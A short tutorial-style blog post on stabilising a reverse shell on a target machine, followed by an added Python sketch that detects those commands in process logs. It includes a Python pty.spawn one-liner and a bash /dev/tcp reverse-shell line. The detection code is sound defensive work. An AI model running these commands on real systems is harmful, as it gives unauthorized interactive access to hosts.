
Upgrading your reverse shell

Author: Nick Chua

Once we have a reverse shell, it will have limitations such as no auto-completion and messy file listings. Here is how we can make our shell better inside our target’s system.

Upgrading and stabilising your shell enables you to type in your commands better. There are several ways to upgrade your shell once you are in a target machine.

First way

For this method to work, we have to check whether our target machine has python2 or python3 installed via:

which python
which python3

Assuming you are running bash, in your reverse shell, run the command below with whichever version of Python is available on the target machine:

python3 -c "import pty; pty.spawn('/bin/bash')"

Press on your keyboard: Ctrl + Z

On your local host:

stty raw -echo; fg

Press on your keyboard: Enter (twice)

If your shell formatting is off, simply enter the command:

reset

Notice that our shell does not cover our entire terminal. To fix this, we shall open another terminal tab and input the following commands:

echo $TERM

Output: xterm-256color

stty size

Output: 70 255

In our reverse shell:

export TERM=xterm-256color
stty rows 70 columns 255

Our reverse shell should now utilize the terminal’s full features!


Second way

Check which version of Python is installed on the target system using: which python or which python3

Next,

python3 -c 'import pty;pty.spawn("/bin/bash")'   # Upgrade to a tty
# Press Ctrl + Z to background the process
stty raw -echo
fg   # then press Enter

Subsequently, turn your unstable shell into a stable one via:

bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
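
From the defender's side, the commands above leave recognisable process command lines on the target. The following Python sketch is an added example, not part of the original post: it flags the pty.spawn one-liner, the stty resize and the bash /dev/tcp redirect in process-creation events. The event fields (session, tty, cmdline) and the sample records are constructed for illustration and do not follow any particular log format.

```python
import re

# Patterns for the commands this page runs on the target host.
PY_C = re.compile(r"\bpython[23]?(?:\.\d+)?\s+-c\b")
PTY_SPAWN = re.compile(r"pty\.spawn\(\s*['\"]/bin/(?:ba)?sh['\"]\s*\)")
BASH_I = re.compile(r"\bbash\s+-i\b")
DEV_TCP = re.compile(r"/dev/tcp/[^/\s]+/\d+")
STTY_RESIZE = re.compile(r"\bstty\b.*\brows\s+\d+.*\bcol(?:umn)?s\s+\d+")

# Constructed sample events (hypothetical field names, not a real log format).
SAMPLE_EVENTS = [
    {"session": "unset", "tty": "(none)",
     "cmdline": "python3 -c import pty; pty.spawn('/bin/bash')"},
    {"session": "unset", "tty": "pts/1", "cmdline": "stty rows 70 columns 255"},
    {"session": "12", "tty": "pts/0", "cmdline": "stty rows 50 cols 120"},
    {"session": "13", "tty": "pts/2", "cmdline": "python3 -c print('pty.spawn docs')"},
    {"session": "14", "tty": "(none)",
     "cmdline": "bash -c bash -i >& /dev/tcp/192.0.2.10/443 0>&1"},
]

def classify(cmdline):
    """Return the set of indicator tags matched by one command line."""
    tags = set()
    if PY_C.search(cmdline) and PTY_SPAWN.search(cmdline):
        tags.add("pty_spawn")
    if BASH_I.search(cmdline) and DEV_TCP.search(cmdline):
        tags.add("dev_tcp_shell")
    if STTY_RESIZE.search(cmdline):
        tags.add("stty_resize")
    return tags

def triage(events):
    """Group flagged events by session and return {session: severity}."""
    seen = {}
    for ev in events:
        tags = classify(ev["cmdline"])
        if not tags:
            continue
        entry = seen.setdefault(ev["session"], {"tags": set(), "no_tty": False})
        entry["tags"] |= tags
        # A PTY spawned by a process with no controlling terminal is the
        # strongest signal: an interactive login already has a tty.
        if "pty_spawn" in tags and ev["tty"] == "(none)":
            entry["no_tty"] = True
    return {ses: "high" if e["no_tty"] or "dev_tcp_shell" in e["tags"] else "low"
            for ses, e in seen.items()}

if __name__ == "__main__":
    for session, severity in triage(SAMPLE_EVENTS).items():
        print(session, severity)
```

A stty resize on its own is rated low because administrators run it legitimately; it only adds weight when it shares a session with one of the other two indicators.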

Thank you for reading!

